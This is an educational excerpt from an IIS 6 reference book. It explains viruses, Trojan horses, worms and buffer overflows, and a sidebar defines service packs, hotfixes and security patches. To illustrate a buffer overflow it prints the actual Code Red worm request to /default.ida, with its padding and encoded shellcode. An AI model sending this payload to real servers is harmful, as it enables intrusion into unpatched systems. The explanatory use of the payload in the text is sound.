Common Types of Security Issues

Because few good technological solutions exist to counter human security problems, we won’t focus here on the human side of this equation—even though, as noted, human vulnerabilities top the list of security vulnerabilities. Instead, we’ll cover some of the common programmatic types of attacks you’ll encounter that you can avoid by using technological solutions.

Viruses

A virus is a program that “infects” the computer in some way, sometimes maliciously, by inserting itself into other, legitimate host files on your system. Two important characteristics of viruses are

  • Viruses must somehow execute themselves on the target machine through a host file.

  • Viruses must somehow replicate themselves.

A computer virus acts much like a regular virus, in that it attacks and weakens otherwise healthy aspects of a system. Computer viruses take over a machine frequently by replacing a valid program on that machine. It then uses that machine to help it commandeer other machines.

Trojan Horses

A Trojan horse is a hidden functionality that is built into a seemingly harmless program and can compromise a system. A typical example of a Trojan horse is a joke program that is passed around via e-mail. When the joke is accessed by an unsuspecting user, some “special” code is downloaded on that user’s system. Once loaded onto a system, it can launch other malicious code.

Worms

A worm is similar to a virus, except a worm does not require the use of a host file to run on the machine. It can spread without piggybacking on another file. A worm file takes over a machine by propagating itself to such an extent that it competes with and overpowers other applications running on your system, causing your system to crash. Worms creep into other systems as well, by replicating themselves to spread to other machines. At this time, worms are the most common type of attack.

Buffer Overflows

Worms can attack a system via several methods, but the most common attack in the Microsoft world is a buffer overflow attack. This is how worms such as Nimda, Slammer, and Code Red attack.

A buffer is a temporary data storage area that programs use to hold data while it’s waiting to be transferred between two locations, such as between an application’s data area and another device, or waiting to be processed. Buffers are common in programming. Because lengths are defined for the data a program will receive, the buffer requirement is an exact size amount. A buffer overflow occurs when a program or process tries to store more data in a buffer than the buffer was intended to hold.

Here’s an oversimplified example of a buffer overflow: Let’s say two applications are talking, and the first thing they are supposed to say to one another is “Hello.” As a programmer, you’d probably set the buffer to five characters, to hold the Hello. Now if someone’s program said “Hey, what’s up?” instead, the program is obviously not conforming to the standard.

If hackers weren’t around, this wouldn’t be an issue, because your program simply wouldn’t work well with the other person’s program, so it wouldn’t make sense for the other programmer not to follow your standard. However, a hacker doesn’t want the program to work with your system—and that’s the whole point of hacking.

In this example, the first thing the programming standard says is that communication begins with Hello. Next, the data that follows tells the program what to do—in this case, let’s say that the data is supposed to be 18 characters. A normal bit of data, then, might look like this:

HELLO OPEN_MY_FILE_&EDIT

In this case, your program checks the data and follows the instructions.

Now we’ll create a buffer overflow by intentionally making the data longer than it should be:

HELLOGRANT_ADMIN_RIGHTS OPEN_MY_FILE_&EDIT

Because the first data is longer than the allowable five characters, the data has to go somewhere, so it overwrites the data in the second buffer—meaning that the data section is an instruction to grant administration rights! From there, the worm can load the malicious code on the system.

This type of attack is prevalent because lax programming practices, coupled with the buffer framework in C and C++, don’t give applications the ability to handle malformed packets.

Code Red is a great example of a worm using this tactic. Here is the request with the buffer overflow that Code Red uses to get into systems using the Indexing Service:

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u 7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a

start sidebar
Definitions

Before you can understand how to fix security problems, you need to be familiar with a few terms. Microsoft has established definitions for service packs, hotfixes, and security patches.

Service Packs Service packs are a collection of software updates that are bundled together for easy installation. They can correct problems in the code, provide product enhancements, and include driver updates. They can also add functionality to software and are typically regression tested. Service packs are cumulative, so each successive service pack contains all the fixes included in each previous service pack. This is handy, because it means that you have to install only the most recent service pack to get all the updates.

Hotfixes Hotfixes are patches for specific products that provide specific updates. They do not go through regression testing before release, and they are not targeted at the general population for installation. Thus, you should install a hotfix only if you experience the specific critical issue that the hotfix is designed to resolve. Typically, hotfixes are created and released only if a critical issue exists and no acceptable workaround is available.

Security Patches A security patch is basically a hotfix that fixes a specific security vulnerability. The same caution should be used for security patches as for hotfixes. However, because security patches usually fix important vulnerabilities, extra consideration should be given as to whether or not to install security patches.

end sidebar

Note the request to /default.ida, with a bunch of characters to overflow the buffer, and then the instructions starting with the %.




IIS 6(c) The Complete Reference
IIS 6: The Complete Reference
ISBN: 0072224959
EAN: 2147483647
Year: 2005
Pages: 193

flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net